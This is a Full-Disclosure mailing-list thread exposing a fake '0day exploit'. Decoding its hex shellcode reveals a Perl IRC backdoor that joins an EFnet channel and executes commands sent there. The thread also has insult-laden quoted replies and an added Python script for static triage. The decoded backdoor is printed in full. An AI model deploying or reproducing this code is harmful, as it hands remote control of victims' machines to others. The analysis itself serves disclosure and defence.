
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)



sounds really useful...

[waKKu@1215n ~]$ python -c 'hellcode=(
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
> "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
> "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
> "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
> "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
> "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
> "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
> "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
> "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
> "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
> "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
> "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
> "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
> "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
> "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
> "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
> "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
> "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
> "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
> "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
> "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
> "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
> "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
> "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
> "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
> "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
> "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
> "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
> "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
> "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
> "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
> "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
> "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
> "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
> "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
> "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
> "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
> "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"); print 
> hellcode;'
#!/usr/bin/perl
$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron
+i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print
$sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
$sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi
2>/dev/null;/tmp/hi
[waKKu@1215n ~]$

print hellcode[764:];'
/tmp/hi


--

On 26 October 2011 13:49, xD 0x41 <secn3t@xxxxxxxxx> wrote:
> yer ofc... anyhow, ignoring you now...
>
> you obv think you're some leet troll, you're not, you're ONLY a TROLL :)
> have a nice day or is that
>
> *Goplamamamama Ignananayu*
>
> forget the jedi oky, you gotta brush up on ya troll trash talk!
> bah hahaha.
> fool
> xd
>
>
> On 26 October 2011 13:44, Antony widmal <antony.widmal@xxxxxxxxx> wrote:
>>
>> Using your smartphone while flipping burgers can be dangerous pandawan.
>> Moreover if you work at burger king.
>>
>>
>>
>> On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 <secn3t@xxxxxxxxx> wrote:
>>>
>>> h the idiot who thinks im laurelai... meh, you're a fool yourself just for
>>> even thinking that much :s
>>> you're but an echo on the list, which, does not echo the rest of it, which is
>>> a good place to be.
>>> unfortunately, you're one of the few who should just be blocked, for making
>>> absolutely nothing but abusive crap...
>>> you're an idiot. not me.
>>> i dont run things, why, have you run it ?
>>> Is it good ?
>>> hehe... maybe it is!
>>> i guess if hes using it...well...
>>> *sic*
>>>
>>>
>>>
>>> On 26 October 2011 13:21, Antony widmal <antony.widmal@xxxxxxxxx> wrote:
>>>>
>>>> Do yourself a favor and run that code dumbass.
>>>>
>>>> On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 <secn3t@xxxxxxxxx> wrote:
>>>>>
>>>>> I use darknets to help me,
>>>>> they send me the info i need.
>>>>> simple answer to simple question.
>>>>> look them up, they may oneday protect you, also.
>>>>>
>>>>>
>>>>> On 26 October 2011 13:15, adam <adam@xxxxxxxxx> wrote:
>>>>>>
>>>>>> http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
>>>>>> claims to be a remote kernel root exploit)
>>>>>> http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
>>>>>> similar code, claims to be an IIS exploit)
>>>>>> http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
>>>>>> thread, code is mentioned though)
>>>>>> I'm sure there's more, but this kinda reminds me of that leaked
>>>>>> "private exploit" on pastebin a few weeks back (you know, the one that
>>>>>> was nice enough to create a _local_ root account), and insisted that it
>>>>>> was private private private and specifically said NOT to leak it.
>>>>>> I am curious as to how you're so certain that it's on "many many
>>>>>> boxes" yet know next to nothing about it.
>>>>>> On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 <secn3t@xxxxxxxxx> wrote:
>>>>>>>
>>>>>>> Hello List,
>>>>>>> I'd like people to also, like this thread asks, to pls give some
>>>>>>> opinion, other than mine.. which, i am yet to make;
>>>>>>>
>>>>>>> http://www.hackerthreads.org/Topic-5973
>>>>>>>
>>>>>>> Please look at this .c code on here, if you wish, and tell me, why
>>>>>>> A. It is still in circulation, seemingly, on MANY MANY boxes....
>>>>>>> B. people still seem to try keep it private :s
>>>>>>>
>>>>>>> This morning, a friend from webhostingtalk.com, asked me to take a
>>>>>>> look.
>>>>>>> I have and, i can only so far say, once i decrypt the shellcode, i'll
>>>>>>> know a bit more..
>>>>>>> altho, i remember this thing, and, so many people were after it,
>>>>>>> people were paying for it, this is first time i have seen it actually
>>>>>>> disclosed tho,
>>>>>>> admittedly only looked today.
>>>>>>> If skiddies are using it to ddos things, I want to make sure i can
>>>>>>> expose it, and kill the threats.
>>>>>>> thank you.
>>>>>>> xd .// exposing bullshit as i ride!
>>>>>>>
>>>>>>>
>>>>>>> _______________________________________________
>>>>>>> Full-Disclosure - We believe in it.
>>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>>> Hosted and sponsored by Secunia - http://secunia.com/



-- 
--
Best regards,

Flávio do Carmo Júnior
Sydney/NSW
http://au.linkedin.com/in/carmoflavio/en
http://0xcd80.wordpress.com
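
Added example (not part of the original message or of the posted .c file): a static triage that decodes the \xNN string literals of a supposed exploit and reports whether the "shellcode" is really a script, without executing anything. The function names, the indicator list and the sample input are constructed for illustration; the indicators mirror what the decoded output above shows (shebang, socket use, IRC verbs, backtick execution, a file under /tmp).

```python
import re

# Matches one C string literal made only of \xNN escapes, as in the posted file.
HEX_LITERAL = re.compile(r'"((?:\\x[0-9a-fA-F]{2})+)"')
# Patterns suggesting the "shellcode" is a script doing network or shell work.
INDICATORS = {
    "script shebang": rb"^#!\s*/",
    "socket use": rb"IO::Socket|socket\(|/dev/tcp/",
    "IRC protocol": rb"\b(?:NICK|JOIN|PRIVMSG)\b",
    "command execution": rb"`[^`]+`|\bsystem\(|\bexec\(",
    "temp-file drop": rb"/tmp/\S+",
}

def decode_hex_literals(c_source: str) -> bytes:
    """Concatenate every \\xNN string literal in the source into raw bytes."""
    out = bytearray()
    for literal in HEX_LITERAL.findall(c_source):
        out += bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))
    return bytes(out)

def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or common whitespace."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data)

def triage(c_source: str) -> dict:
    """Decode the payload and describe it; nothing is ever executed."""
    payload = decode_hex_literals(c_source)
    ratio = printable_ratio(payload)
    return {
        "length": len(payload),
        "printable_ratio": round(ratio, 2),
        "looks_like_text": ratio > 0.95,  # real machine code is rarely all-printable
        "indicators": [n for n, p in INDICATORS.items() if re.search(p, payload)],
    }

def to_c_literals(text: bytes, width: int = 8) -> str:
    """Helper for the constructed sample: encode bytes as \\xNN C literals."""
    esc = ["\\x%02x" % b for b in text]
    rows = ['"%s"' % "".join(esc[i:i + width]) for i in range(0, len(esc), width)]
    return "char shellcode[] =\n" + "\n".join(rows) + ";"

# Constructed, harmless sample: a shell script disguised as shellcode.
SAMPLE = to_c_literals(b"#!/bin/sh\necho decoded > /tmp/demo\n")

if __name__ == "__main__":
    print(triage(SAMPLE))
```
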
